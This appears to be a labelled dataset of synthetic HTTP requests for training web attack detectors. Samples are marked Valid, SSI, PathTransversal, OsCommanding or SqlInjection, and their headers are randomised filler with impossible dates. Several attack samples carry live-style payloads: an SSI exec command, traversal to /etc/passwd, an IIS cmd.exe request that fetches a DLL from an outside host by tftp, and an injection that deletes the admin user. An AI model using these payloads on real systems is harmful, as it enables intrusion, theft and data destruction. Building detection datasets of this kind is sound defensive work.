Via: 9.7 www.nTxr.js, 7.1 www.ufeoac.css:58, 0.0 www.xgj7s.js
Transfer-Encoding: deflate
Upgrade: nabt/0.9, eeur5/2.7, a7edbd/6.8, aaey/5.0
Warning: 512 93.163.50.162 "gen9b" "Thu, 14 Oct 04 24:38:21 CET"
X-Forwarded-For: 125.30.59.190
X-Serial-Number: 00770838075
----: ---------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 16759
Start - Id: 40110
class: SSI
GET /gepd/rjPgNRUI8gFMxPz/nncmdc57OUKC/jYHFAQvycddUtlncVRJ/g0ghz/e.fJ/p-3pdntocSJ/cD@Nj-lFj5x/ogJWqlda854@5/gn/67pcdarsN4.msf?ltytnhetsyili=sJt&ntonu1f=%3C%21--++++%23exec++cmd%3D%22%2Fbin%2Fls++-l+++++%2Fhome%2Ftt%2FhIj%22+++++--%3E&8vi=Rye5q%5Ceaglln&vwsv=nep&0hutetralrfot3t=sddnnd HTTP/1.0
Host: www.2lsipo.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: tyw67-dbkngont;q=0.7, 99sUrmt-rEoaerp, h-atSsg;q=0.5
Cache-Control: t=e6Gn
Client-ip: 9.112.225.81
Cookie: BvfromyGqb=691;pKpoajvrseds=oOtmeevao@NTst;cn=bnEdt9i;1annc=ivthsock_stream~ip;llnkooIhcrHo=/ls>aotyuKdd;vibwastdl=188178317
Cookie2: $Version="7"
Date: Sat, 05 Jul 08 13:33:13 UTC
ETag: "KWc9mgq3KIQTOz.Z8"
Expect: 100-continue
From: ryup@srni.ch
If-Modified-Since: Fri, 26 Feb 10 11:05:47 GMT
If-Unmodified-Since: Wed, 10 Oct 07 23:00:49 CET
If-Match: "Vh_63pD2v1mh9G1d"
If-None-Match: "QBL6hjAmg7Mh1Slj"
If-Range: "kznuwC@gtW5NbrLTnz6"
Max-Forwards: 878
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic b2hpbzJwOmh0cjI=
Authorization: lcb2Rh 8feofloz=9eso
Range: 01784-577,9-7,8678-
Referer: http://addtahrS.org/h7sAestS/wshtr/jvtl/3E6ro.sh
TE: deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.5 (X11; U; SunOS sun4u 1.0; ai-ae; rv:4.0.2) Gecko/73703521
UA-CPU: 68000
UA-Disp: 3405,153,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7286x8366
Via: la2u/1.6 www.rfprsI.jpg
Transfer-Encoding: identity
Upgrade: Iisgx/0.5, asoins/6.2
Warning: 805 www.ithet.png:8 "EIrr" 
X-Forwarded-For: 241.68.225.159
X-Serial-Number: 606454137105
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40110
Start - Id: 45991
class: PathTransversal
PUT /f1deCizwBpz6@/dW26k6p/rnIigesh/02G9nlsock_stream4/kSNqhkMa-I/mor4mm.jpg? HTTP/1.1
Content-Length: 281
Content-Language: dahdibh,n5arp,msb
Content-Encoding: deflate
Content-Location: http://rcjtraeq.ch/awlrta.mpeg
Content-MD5: MHNzb3VsaXR0c250bjZvVA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 07 Feb 08 22:54:58 CET
Last-Modified: Sat, 18 Mar 06 12:58:42 UTC
Host: 16.88.25.121
Connection: uarpf
Accept: image/gif;q=0.5, video/quicktime;q=0.4, application/*;q=0.5
Accept-Charset: windows-1250
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 82.202.242.103
Cookie: atsnm=ShbFrrRie
Cookie2: $Version="5"
Date: Tue, 23 Dec 08 21:29:10 GMT
ETag: "qr40eZzSfekcGIG25n."
If-Match: "SwH.ceIgMeT3q9oXa"
If-None-Match: "vBL3DBoaZyT.4uLsgPf"
Max-Forwards: 630
Pragma: no-cache
Referer: /pendp.jsp
User-Agent: /../../../Inetpub/iissamples/talaonit/trel/olstilonsi/ningleti.php3
Via: iEud/4.1 www.vivdougm.shtml
Upgrade: vN9sx/9.8, tWu3x/5.1, T6RJfs/4.2
Warning: 349 163.2.244.99 "tlbs" 

YpQ-httpaGM=078364&sejare=lmegEtnzrelnsRtio9&iuCepgewttlg='lto&jdpEeispit=bodyd a$mhnueevalaaccess_logexec&awwtAM6=eTv8LgxcPH&ch=0870951942&ELNXfBtmpUMJxphp=129127&5pF2piH=tbkT&9ne=1iaBhinsert&mittua1npu=7cwbre m3&tg=327839141&tyA=ienRLgn75AiOageefX&pnezco4grda=148296&Th-s=282

End - Id: 45991
Start - Id: 17151
class: Valid
GET /8ToaOe/nY-Fpdzi2PGcqZ6/1DqO1JI5lZMR0/hNYEG0MR2Qp1/a35hRJ2zCNa/SrbRSaeaams.gif?kio=iktuubyaqmn&haoa=tootlu&n2kA=php1yaien&syef1=4 HTTP/1.0
Host: www.O2ideo.com:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic;q=0.8, euc-kr;q=0.9, x-mac-roman, iso-8859-15
Accept-Encoding: gzip
Accept-Language: *;q=0.6
Cache-Control: max-age=3475
Client-ip: 135.104.246.43
Cookie: 8scriptnqS0T=687;tHWKBfYk=2364248;cne7rtvhprf7ec=updateu;hFAOJ=72VJekhap;ku7isnaj6aLi=7ar8e8s;bperl%uCTq8jIAb=22757
Cookie2: $Version="71"
Date: Wed, 14 Mar 07 23:23:43 UTC
ETag: "Gro2HZyrngc6QuB6f4"
Expect: yuoeintc
From: gcEsmc@smae.st
If-Modified-Since: Thu, 13 Mar 08 14:22:08 CET
If-Unmodified-Since: Mon, 18 Jul 05 24:47:59 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 28 Jul 04 02:32:00 GMT
Max-Forwards: 4676
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWw1YzF0U1RkcmVlWnB5aGhpbzJOZXdQbGlkU29ucm9s
Authorization: Basic dHNuUnM6YXJvM3N3ag==
Range: 6398-,1074-5081,99-87016
Referer: /eyedy/tqi0sefe.pdf
TE: trailers
Trailer: Accept
User-Agent: loHsz1/3.3.9.5
UA-CPU: StrongARM
UA-Disp: 817,8711,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0887x1006
Via: HTTP/0.4 24.174.19.210, 6.1 www.hseuRiab.shtml
Transfer-Encoding: gzip
Upgrade: wbigqt/6.4, hv08se/7.5, ses/3.0, iei/9.4, n6vl/4.7
Warning: 884 66.52.11.38 "buetRO9tneeajg1yc" 
X-Forwarded-For: 125.81.27.179
X-Serial-Number: 92445
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17151
Start - Id: 24286
class: Valid
GET /xUOfMHSsLtqW3/ecQaIhdmPbpy/MeAdLesadosltRnere/CrbcfeSoE/eQbk8/o5/uboA8u25tK_.jpeg?kaowH1ot3tcia=oescriptbi&CassqeEye=2509127&xaitaii=616041&noiiiitYn=+logqceag%25+r&Aie=+djformiframe1%24ocmdrels&fGsnovmoDt=hoeDhpnE&l0pr6=a3an6hAne&hmde7eppDigtd=oaBysyd&d2n=013&jwpf2onqRNayz=Deardoyttoa&ateceymuTq=euaeavnEdtsaiolm&ii=t2wd9e HTTP/1.0
Host: 237.120.136.204
Connection: 9njhm
Accept: */*
Accept-Charset: iso-8859-2, x-mac-hebrew, windows-1254
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 145.172.207.179
Cookie: yfpe9bymh=o8st O~$E;eeVrmrHu=p5y-opo
Cookie2: $Version="255"
Date: Wed, 02 Jun 04 08:11:34 UTC
ETag: "KLlIolL8Io.c6m_"
Expect: 100-continue
From: somsctd@slielEozga.ch
If-Modified-Since: Fri, 16 Jan 09 04:09:56 UTC
If-Unmodified-Since: Mon, 26 Apr 04 02:58:03 GMT
If-Match: *
If-None-Match: *
If-Range: "t1BFL3-HGgVeBjgbceq0"
Max-Forwards: 67
MIME-Version: 6.8
Pragma: astlot=if
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM OHd3ZW90ZDk2aVVvcWVoemF2MXRlZTNudGFhd29uc21TYWluaXhwYXRlbGU=
Range: -1827
Referer: /i63i/r6na3/i8httt/aieolea.cfm
TE: gzip,trailers,trailers
Trailer: Authorization
User-Agent: nteudnr (eyjHnY; oYjAa@; sKSYGP)
UA-CPU: 68000
UA-Disp: 097,7605,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 982x566
Via: HTTP/2.6 51.212.76.37, 5.7 182.18.230.150, FTP/5.3 www.gearh.shtml
Transfer-Encoding: identity
Upgrade: 4sl7/2.9, iwl/9.9
Warning: 424 www.eiEotsb.html "JlC2tlnYe6ee" "Thu, 26 Jan 06 23:48:23 CET"
X-Forwarded-For: 197.180.62.9
X-Serial-Number: 21325127322802331
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24286
Start - Id: 46141
class: PathTransversal
GET /cS1ahutR/tBUZ4ctC35x/rvrDlqzGm2Rl.swf?rWAGU5t3ett=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&eyC5inlaxEfed=0&gmMz=nehpechoi&sW=90439120&aasarxgtS1da5S=da3loptlinkdgurltd%3Bate HTTP/1.0
Host: www.hclnnem.be
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip
Accept-Language: rnithO-sbdid3w;q=0.7
Cache-Control: only-if-cached
Client-ip: 219.211.206.215
Cookie: dymt=hxm;Ui3ya5Jrc=ftiahq1 2eihgrhttpireyx
Cookie2: $Version="9"
Date: Wed, 10 May 06 03:03:05 GMT
ETag: "tJuxWT97BFHkVSwXek"
Expect: 100-continue
From: rnis7ym@dolsohsitn.org
If-Modified-Since: Sat, 23 Jun 07 14:26:28 CET
If-Unmodified-Since: Fri, 24 Aug 07 15:01:47 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 28 Sep 05 18:44:33 GMT
Max-Forwards: 6326
MIME-Version: 8.6
Pragma: s='ttH'
Proxy-Authorization: NTLM ZmtlMG53bm9pc3N0cDR1aWlhbmF2b2FkaGM1aW5ldGhk
Authorization: Basic OWJvYWJ5YWE6aGFzYXA=
Range: -526467,43-,829-431383
Referer: http://www.sids9.ch/ltryrst/ye3j.mdb
TE: chunked,deflate,chunked
Trailer: Upgrade
User-Agent: u8EQni/9.4.6
UA-CPU: x86
UA-OS: Linux
Via: 4.8 100.17.179.7, HTTP/7.0 58.88.126.188, ticw/5.1 www.rtlY6.shtml
Transfer-Encoding: deflate
Upgrade: 4sr0z/5.8, 5eIsba/5.8, lviujp/4.0, arJ2h/2.1, fgge/2.5
Warning: 167 60.70.73.146 "Bech10nim" "Wed, 08 Feb 06 20:07:02 UTC"
X-Serial-Number: 678023085
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46141
Start - Id: 12285
class: Valid
GET /iiDdetleniiLoilctrr/m758pFpncQ7w/hUnZ0YA7w_m__jrO.php?oldi8nml8gl=aa&v5W0processing-instructionzidv=eA&rGinepss4ec=u%5Ct&us=ejtpEGoxenpeszmek HTTP/1.1
Host: 19.207.44.92
Connection: close
Accept: image/*;q=0.9, audio/x-wav;q=0.5, application/*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: HOanr3=ntimpn
Client-ip: 8.180.18.17
Cookie: nMlrreDi=uSWL3vfBJMYi
Cookie2: $Version="10"
Date: Thu, 07 Apr 05 21:35:15 CET
ETag: "ET@n_AqlUV.56CF"
Expect: ptsaptmt=stMg2l;hl6Iedob=eRehein
From: pwgrma@e4nqarn.be
If-Modified-Since: Thu, 11 Feb 10 08:22:40 GMT
If-Unmodified-Since: Wed, 16 Mar 05 10:51:57 GMT
If-Match: "9x9ez2sdqtkW5WuLIq1"
If-None-Match: *
If-Range: *
Max-Forwards: 9510
MIME-Version: 5.0
Pragma: h=tIwti
Proxy-Authorization: Basic dG1yeWxhajY6YjVsMnVhdG8=
Authorization: Digest cnonce="KaejideH"
Range: 9688-4015,-4,45-
Referer: http://UBblf.biz/crcnhasc/nhwNot3r/MsbN/aaijs/viDa8h.php
TE: deflate
Trailer: Host
User-Agent: Mozilla/7.5 (Windows; U; Windows NT 0.0; us-ee; rv:2.6.4) Gecko/27686211
UA-CPU: x86
UA-Disp: 689,5553,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 981x039
Via: rrcs/1.3 www.jM5e6P.jpg
Transfer-Encoding: gzip
Upgrade: yohoh/1.0, aet/2.6, xthnat/0.6
Warning: 710 44.94.63.159 "Dh6webSt4" 
X-Forwarded-For: 108.211.80.19
X-Serial-Number: 787463
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12285
Start - Id: 26725
class: Valid
GET /8RPqR2/0r3vijwfNir/to66vN5CBVrbfCrhTVq/clAtRIuRszdg.js? HTTP/1.1
Host: www.lrrwoYoude.biz:887
Connection: keep-alive
Accept: video/quicktime, video/mpeg;q=0.2, text/*;q=0.0
Accept-Charset: koi8-r, euc-jp;q=0.9, x-mac-arabic;q=0.6
Accept-Encoding: gzip, identity, deflate, deflate
Accept-Language: *;q=0.3
Cache-Control: max-stale=38
Client-ip: 180.91.240.171
Cookie: XrQGem-@BJ=s@inu<liframeetaU+;ooau2ee2toc0gd=oe)ioereuio ;B;ieentr=ln4hoKA9v-;siean0o=Mub;sdInthsat=a emeta<
Cookie2: $Version="07"
Date: Fri, 21 Jan 05 21:00:19 UTC
ETag: "T8@J8mWCMvFmLewuG"
Expect: 100-continue
From: fIew@eoa8.org
If-Modified-Since: Tue, 28 Apr 09 04:19:13 GMT
If-Unmodified-Since: Sat, 08 Mar 08 08:21:10 CET
If-Match: "iZPTmHp.gCcCFe@BtwP"
If-None-Match: "6UTzUj-ipAqRfDFi"
If-Range: "y9jKfN6N8-@g4jjinPB"
Max-Forwards: 219
MIME-Version: 1.9
Pragma: 0v6tnvo='rsye'
Proxy-Authorization: NTLM cmFyc0VuaTF5aHRvcjJsTnRpNXNpcml3aTh1ZWRzYXRlbGgxd2VoMkFsaHJzU29u
Authorization: Basic cjlwZ2liczI6ZWJkbHQ=
Range: 74-,31612-
Referer: http://euhrdjbt.net/nnbutnl/ssen4l.pl
TE: deflate;q=0.4
Trailer: Accept
User-Agent: nueatouio (eflI1yS)
UA-CPU: StrongARM
UA-Disp: 221,658,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 873x2179
Via: HTTP/0.0 14.166.242.154:8242
Transfer-Encoding: greyl
Upgrade: meei/2.3, xno/3.4, dkyly0/0.1, rey/1.4
Warning: 653 www.rIlbwe.html:51762 "pn4htodnstaeHz" "Sat, 18 Dec 04 07:27:35 UTC"
X-Forwarded-For: 236.49.26.118
X-Serial-Number: 1194043277645
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26725
Start - Id: 43674
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
Host: www.rNnmj5.de
Connection: zetfa
Accept: application/rtf
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: min-fresh=3
Client-ip: 123.220.31.165
Cookie: Ignj=9Sur;whl6fsnl0R9er=hqo13bsode1i;wa7= mac;nestahnxaa=tt;Deryer3hrms5Tst=:p/:;yWRb_J0Mobject1=935
Cookie2: $Version="617"
Date: Mon, 26 Feb 07 20:28:54 CET
ETag: "y-vPzRAwL-5olCNDYBs"
Expect: l9owie
From: r63aj@miwmhwde.ch
If-Modified-Since: Wed, 27 Feb 08 19:17:13 UTC
If-Unmodified-Since: Mon, 14 May 07 06:24:17 GMT
If-Match: "uZEImgwAnn6.GHfE8NC"
If-None-Match: "Awge4HWHkOQfguVPn-"
If-Range: Sun, 31 Jul 05 13:20:23 GMT
Max-Forwards: 2532
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest username="gvaaal"
Authorization: Digest algorithm=MD5
Range: 42-91,822939-,-31
Referer: /i4lvgf/9ntr/xasat/T7dncp.php4
TE: trailers,chunked
User-Agent: Isisd/6.4.2.3.0
UA-CPU: x86
UA-Pixels: 697x5821
Via: 7.1 75.184.17.237, 4.8 www.eh1stfd.htm
Transfer-Encoding: identity
Upgrade: akEzd/2.3, jeaovc/8.8, iti/8.8, Yya3/8.2, lrscJp/3.7
Warning: 267 17.232.146.208 "uEwtOaeI" "Fri, 11 Sep 09 24:54:08 CET"
X-Forwarded-For: 163.232.189.112
X-Serial-Number: 84513190969177426
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43674
Start - Id: 29399
class: Valid
GET /edihssaaRM5rmlelnmn7/oldnlasreZsyacqrNXxi/jVsdPQN2UBWT-MQlYIDu/farpAnnsahem/gsnxddwyajeezkboodoT/6.W.php3?leszasune=w%3E&oeosWutahufoq=nlva%7Enpassthruha%5Ct HTTP/1.0
Host: www.liiIOT0.ch
Connection: close
Accept: image/jpeg
Accept-Charset: iso-8859-6, windows-1253, x-mac-cyrillic;q=0.6
Accept-Encoding: 
Accept-Language: isnty-6yezr;q=0.2, ubern-enaprwu5;q=0.5, OhlW-ina;q=0.9
Cache-Control: min-fresh=546
Client-ip: 152.201.222.227
Cookie: ituieEreire=65260558;me=813654
Cookie2: $Version="476"
Date: Mon, 28 Sep 09 13:49:15 GMT
ETag: W/"r@L8Li8GcYN1uefJ"
Expect: 100-continue
From: onTs@ajeeiGu.com
If-Modified-Since: Tue, 10 Apr 07 13:48:51 UTC
If-Unmodified-Since: Sun, 06 Aug 06 03:46:12 UTC
If-Match: "Zt-QNtMe9Iezp18"
If-None-Match: *
If-Range: *
Max-Forwards: 8610
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest response="A3dad1771A337dd5b4BEC4D3d631aeF3"
Authorization: Digest username="erea"
Range: 61375-,6799-
Referer: /twpee6/sbeorsh/6cah/7lc6qas/eeawplld.msf
TE: chunked,trailers,chunked;q=0.7
Trailer: Range
User-Agent: Mozilla/7.9 (Windows; U; Win98 0.9; Pm-en; rv:8.4.2) Gecko/51139562
UA-CPU: MIPS
UA-Disp: 2709,267,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 0011x3310
Via: 4.0 www.a5jal.shtml, HTTP/5.5 www.msmMnqn.shtml
Transfer-Encoding: identity
Upgrade: hoonng/3.0, etnsa/4.8, wUr/4.5, pgotom/4.2, r7etDt/6.9
Warning: 637 216.250.224.103 "tew7rd" "Sat, 20 Sep 08 06:41:50 GMT"
X-Forwarded-For: 2.168.186.132
X-Serial-Number: 55211271758
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29399
Start - Id: 26349
class: Valid
GET /5rkm2sGBr/sAxQrkO3pZ.i@b_p/1tnpCnt/hRCF7CUu@3/PcSDS/llipzivneoomO2s2ilih/u8MmuW/edRQ/9rc9/dynPq0dbaJ98nppYU_Q4/loal_oFzWY/uW.html? HTTP/1.1
Host: 5.250.114.198:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: gzip;q=0.3, deflate;q=0.0, gzip
Accept-Language: *;q=0.4
Cache-Control: max-stale=662
Client-ip: 154.55.13.229
Cookie: bYl6gaherhhTle=msttneetees9ti3a;e5fse3c07=e6|U;etzuesfIt8zdto=ng(/1lgroup by&eh zn;tbhgitoolt=4390;o0Mm=td%sock_stream
Cookie2: $Version="220"
Date: Wed, 22 Apr 09 15:07:44 GMT
ETag: W/"cSjr2j9ZFD-lBGB1"
Expect: auesetr=iahaYaol;paNis5ax
From: litete@eg14llw.net
If-Modified-Since: Sun, 20 Nov 05 16:11:39 GMT
If-Unmodified-Since: Tue, 05 Jun 07 14:39:20 UTC
If-Match: "cT.Y8LjfMa8Dw@R"
If-None-Match: *
If-Range: Thu, 06 May 10 05:36:50 CET
Max-Forwards: 741
MIME-Version: 9.2
Pragma: meit1='0av'
Proxy-Authorization: Basic bmVyM2J1cjppRWlI
Authorization: Basic YXNvODppbjV0ZXI=
Range: 909-,364148-
Referer: /tcsaoedi/3oJdiee.mdb
TE: deflate,deflate
Trailer: Warning
User-Agent: Mozilla/9.3 (compatible; p4ttsgq0; Win98; Staa; edasos; polbem)
UA-CPU: 68000
UA-Disp: 417,8223,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 917x537
Via: 5.3 185.81.2.237, 1.4 2.41.58.217
Transfer-Encoding: compress
Upgrade: Eiaw/5.1, mcn/4.8
Warning: 770 www.isuhre.shtml:304 "o7pHi4i84noopu8" "Fri, 07 Aug 09 15:30:51 UTC"
X-Forwarded-For: 113.183.151.252
X-Serial-Number: 908761770500
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26349
Start - Id: 41963
class: SqlInjection
GET /huAvr/e8cbpYypjduN2EEB/vlibflJ1LQJRGJE/PstdinCUaneAUVuCR6/Sf/3dles3snnanehtai.php?hsFm=er&nipac=708649&ospeeh=622349&eduDi=s&et=hsebs&ainErcr5As=5&rcpjyc=egjo%27%29%3B+++DELETE+++++FROM+users+++WHERE++++upper%28username%29+++%3D++++upper%28+++%27admin&lfbeaar=4&gXLHgH6updateWeunion=a+dr%22m%22fdne&gaqspd3eFn=69217856&ont=7na6a2uefoDnmntql&bjfetb2=81003344&r3=5617409&Ieoir1=4Iebndrtt&auu5eiagohe=5homl0+n HTTP/1.1
Host: www.Iehaedh.uk
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: iso-2022-jp, x-mac-korean, iso-8859-3, isiri-3342;q=0.6, hz-gb-2312;q=0.2
Accept-Encoding: compress;q=0.5, gzip, deflate, deflate
Accept-Language: *
Cache-Control: no-transform
Client-ip: 239.226.10.103
Cookie: 9XcBVs@=ebisbaof;7i5ti=scriptarthd
Cookie2: $Version="14"
Date: Thu, 27 Nov 08 24:25:59 GMT
ETag: W/"L5smUaADBs4uUok.30rh"
Expect: 2eweYa=sefI;hdtn
From: 4zD9@jt6etwau5.be
If-Modified-Since: Wed, 29 Oct 08 10:17:08 UTC
If-Unmodified-Since: Mon, 03 May 10 20:05:42 GMT
If-Match: *
If-None-Match: "lzrt-akqZh-eIEpQvG6U"
If-Range: *
Max-Forwards: 182
MIME-Version: 0.8
Pragma: siottdgm='b8'
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: 170-12,11579-8643,1-
Referer: /suspsfw/itnphs/qoY8a/umnfs.swf
TE: deflate,gzip;q=0.9,trailers
Trailer: Proxy-Authorization
User-Agent: etaTsytAahtHbvt0
UA-CPU: MIPS
UA-Disp: 4298,556,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1383x317
Via: 0.7 181.119.192.241, HTTP/5.9 www.ssal.jpeg, FTP/0.9 53.112.180.184
Transfer-Encoding: identity
Upgrade: osgosN/1.6, nzpps/5.5, rhoft/4.2, feo/7.7, htler/3.3
Warning: 494 42.216.10.168:95428 "esi7pe3nyrrtei" "Wed, 28 Apr 10 16:07:09 UTC"
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 41242078999326437
----: ------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 41963
Start - Id: 10202
class: Valid
GET /ltfgl/tvqacHlrXCWpwLJcjKI@/6EIusrLIUqU@Cafdiv/SJ3e.css?geasbi=7902795&etse=nRVc5nwh&yNirnnn0abcaan=ll&Reii7kgxlttngm=iacibeIwstoetawtti&fXlDacc=01&oaharavbil=21041643&JQJEvN=7379&n3teltlwhsnnn7=uemkmeayotmiHis HTTP/1.0
Host: www.tjKt5xhe.cz
Connection: close
Accept: application/rtf;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 217.101.27.185
Cookie: suesjEuobt=<tHdu0lAservicesy;ehelhzrictiRd=24
Cookie2: $Version="79"
Date: Mon, 20 Jul 09 08:47:57 UTC
ETag: "Div0-MtcnHnCyom9avp@"
Expect: hlcehgHe=cThiawDn
From: ufeeti@ieeinuty.it
If-Modified-Since: Sat, 21 Jul 07 24:46:32 UTC
If-Unmodified-Since: Sun, 23 Nov 08 22:16:12 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 15 Feb 10 23:16:57 CET
Max-Forwards: 30
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest realm
Range: 6325-,8-,328575-
Referer: http://www.h4Cvt.gov/netgt/tryZ7ih/msui/fsecti8.cfm
TE: gzip,deflate
Trailer: Pragma
User-Agent: Mozilla/2.7 (Windows; U; Win98 1.0; lA-sp; rv:6.4.6) Gecko/07603334
UA-CPU: x86
UA-Disp: 6635,0350,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 099x017
Via: 4.5 www.saepdw.tiff, telrjn/5.0 212.139.26.114, FTP/5.1 www.tgref.html
Transfer-Encoding: identity
Upgrade: ce2fw/5.5
Warning: 637 www.hs6E.png "t1aojshwaSSaeBsobih" "Fri, 24 Jun 05 14:32:42 CET"
X-Forwarded-For: 119.252.21.3
X-Serial-Number: 9799950017867099
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 10202
Start - Id: 4259
class: Valid
POST /hqHd0/1t6eeo3trn3ereegls0/CvOwiVaMCu1php/@DG/eb8/cK/fSfQrhvexf9jVnc3X/e1eio5ioo.tiff? HTTP/1.0
Content-Length: 69
Content-Language: rc,iLaI8dau,ebtooea
Content-Encoding: deflate
Content-Location: /iOnbdea.shtml
Content-MD5: bG5hYXJoeHNzcmtvbjB1dA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 07 Jul 09 04:43:40 CET
Last-Modified: Fri, 15 Jun 07 13:01:08 GMT
Host: www.oianboldal.de
Connection: Ha1rir
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: identity, identity, identity;q=0.6, compress
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 113.87.214.25
Cookie: ek=tdAYZAEM9;Teb7atc=emdhynetopen
Cookie2: $Version="11"
Date: Fri, 11 Jan 08 06:10:18 CET
ETag: "FZaQFhCBRmUNO@lzenU"
Expect: 100-continue
From: sblb@seuhwa.net
If-Modified-Since: Fri, 04 Aug 06 14:56:40 UTC
If-Unmodified-Since: Mon, 24 Nov 08 22:38:46 GMT
If-Match: "e0-GA5.@8IFiQ4GSyyts"
If-None-Match: *
If-Range: *
Max-Forwards: 7197
MIME-Version: 7.5
Pragma: w8irmua='zweSGht'
Proxy-Authorization: Basic MnBJbm1EOnR4b3R4NjE=
Authorization: NTLM M291ZG53bm9ybXNhbWJobGh1aG9kVENpYXFscm5NdHNkc3Vh
Range: 19-,7131-
Referer: http://oertlto.st/tngt/IeGetgnu.css
TE: deflate,gzip;q=0.3,trailers
Trailer: Warning
User-Agent: Mozilla/7.4 (Windows; U; Windows NT 5.4; Bt-eh; rv:0.2.6) Gecko/41426740
UA-CPU: StrongARM
UA-Disp: 4721,826,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 193x5257
Via: FTP/4.1 www.utSm.gif:7171, YnEnlr/1.3 www.rxsaoos.shtml, 7.6 www.tuo83a.jpg:04
Transfer-Encoding: deflate
Upgrade: elldh/2.3, hhMe/5.9
Warning: 506 www.tlcm.tiff "GNPpw" 
X-Forwarded-For: 240.213.181.129
X-Serial-Number: 62285156998436291420
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

osge=cilvlhr0<>Hts9&6zaecqAknrfd=AleOepEe8l7t38&hditfQ7rilsenAa=s

End - Id: 4259
Start - Id: 45229
class: PathTransversal
GET ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////? HTTP/1.0
Host: www.xwchtgtegn.uk
Connection: qtAbsw
Accept: application/*, audio/*;q=0.8, video/quicktime;q=0.7
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-age=9
Client-ip: 91.52.105.115
Cookie: glinuata=tje_8U6i;ra6hcfvDvitr=250;hew6cy2=aaxert6;trfln=2435663;bh0ke2sek=88536033
Cookie2: $Version="1"
Date: Sat, 01 Oct 05 04:06:23 CET
ETag: W/"HAjYQ@UH.6s769k_XZxi"
Expect: hslN
From: sgrttcno@xhaofa.gov
If-Modified-Since: Sun, 09 Apr 06 13:49:28 CET
If-Unmodified-Since: Mon, 10 Apr 06 05:19:14 CET
If-Match: "8NKHrVu-PltzuDw"
If-None-Match: *
If-Range: "8T5L4GgFvZW0@wE3y"
Max-Forwards: 128
MIME-Version: 3.6
Pragma: a2tot=rebrch
Proxy-Authorization: Digest qop=evai40
Authorization: Digest uri=/elhaoter/Akjpd/irwehq/hNnNyd/aa3at.php4
Range: -01750,762-,10389-0
Referer: /tcsO/Enoi/deknpeo/lyioad.mspx
TE: trailers,chunked;q=0.2,trailers
Trailer: Expect
User-Agent: Mozilla/4.9 (compatible; 3vrmHeqr; SunOS sun4u; Eeiaes1; t9gneffert)
UA-CPU: x86
UA-Disp: 675,5988,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2272x045
Via: 9.4 150.248.201.188, 5.6 179.191.146.1
